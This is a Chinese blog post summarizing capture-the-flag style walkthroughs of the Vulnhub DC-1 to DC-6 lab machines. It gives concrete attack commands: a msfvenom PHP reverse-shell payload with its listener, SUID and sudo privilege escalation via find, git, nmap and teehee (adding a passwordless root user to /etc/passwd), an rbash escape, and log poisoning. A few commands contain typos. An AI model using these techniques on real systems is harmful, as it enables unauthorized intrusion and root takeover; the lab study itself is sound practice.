Vulnhub靶场,DC系列总结

DC:1总结

1.信息收集发现靶机ip,用whatweb发现网站的框架。用msf搜索可利用的漏洞,反弹shell,到此,我们得到的是一个不完整的shell,所以使用python中的pty模块,来反弹一个完整的shell
python -c "import pty;pty.spawn('/bin/bash')"

2.可以用该文件生成自己的密码hash值替换数据库hash

3.提权

liunx提权一般有四种提权方式

1.sudo提权,通过命令sudo -l查看是否有可提权的命令。
2.suid提权,通过命令find / -perm -4000 2>/dev/null查看是否具有root权限的命令
3.系统版本内核提权。
4.通过数据库提权


通过命令查看是否具有root权限的命令

find / -perm -4000 2>/dev/null

发现_find_具有root权限。直接执行命令提权

find -exec /bin/sh \;

4.完成

DC:2总结

DC

1.nmap -A -p- <ip>可以找到该ip开放的端口

2.需要改hosts,不然访问不了,解析不到   /etc/hosts

3.使用cwel来生成密码字典,cewl http:xxxxxx > pwd.txt

cwel字典生成工具用法:https://www.codercto.com/a/44828.html
4.我们用wpscan枚举出当前存在的用户,wpscan --url http://dc-2 -e

5.提权

用不了su cat等,绕过rbash(受限的bash),需要设置一个环境变量

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin


git命令提权

jerry@DC-2:~$ sudo git  -p help
!/bin/bas

6.完成

DC:3总结

1.用whatweb发现是由Joomal框架搭建的web网站,用Joomscan工具扫描网站 获得到当前Joomal框架版本和后台登录链接

joomscan <url>

2.使用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞

searchsploit Joomla 3.7.0

查看该漏洞
searchsploit -x <path>

3.其hash值存储为txt文件后,使用工具john 进行hash爆破

4.msfvenom生成远程控制木马,上传到漏洞点

msfvenom -p php/meterpreter/reverce_tcp lhost=x.x.x.x lport=xxxx -o shell.php

 

 

 

 

 5.使用msfconsole进行监听,当漏洞页面访问后,即可成功反弹shell

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhoat x.x.x.x
set lport xxxx

6.查看内核版本 uname -a找poc。上传exp,上传到靶机的/tmp目录下,然后执行exp,即可提权成功

7.完成

 

 DC:4总结

1.查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

直接向/etc/passwd中增加内容:
echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息
命令解释程序(Shell)
添加一个 hack用户,并使用teehee执行写入 passwd中
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

参数解释

    #如:admin:x:0:0::/home/admin:/bin/bash

    #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]

    "-a" 选项的作用等同于 ">>" 命令

 2.完成

DC:5总结

1.nginx日志文件默认放在/var/log/nginx下 配置文件是/etc/nginx/nginx.conf

2.file写入命令传输,发现都会被日志给记录下来。那么我们可以尝试通过file传递写入反弹shell,监听靶机

 

 3.完成

 

 

 DC:6总结

1.nmap 脚本执行提权

echo 'os.execute("/bin/bash")'>getroot.sh           //将命令写入getroot.sh   >是将前面的输出作用于后面
sudo nmap --script=getroot.sh

2.完成

 

 

 

---------------------------------------- 未完-------------------------------------------

posted @ 2023-01-08 20:57  木易同学  阅读(161)  评论(0编辑  收藏  举报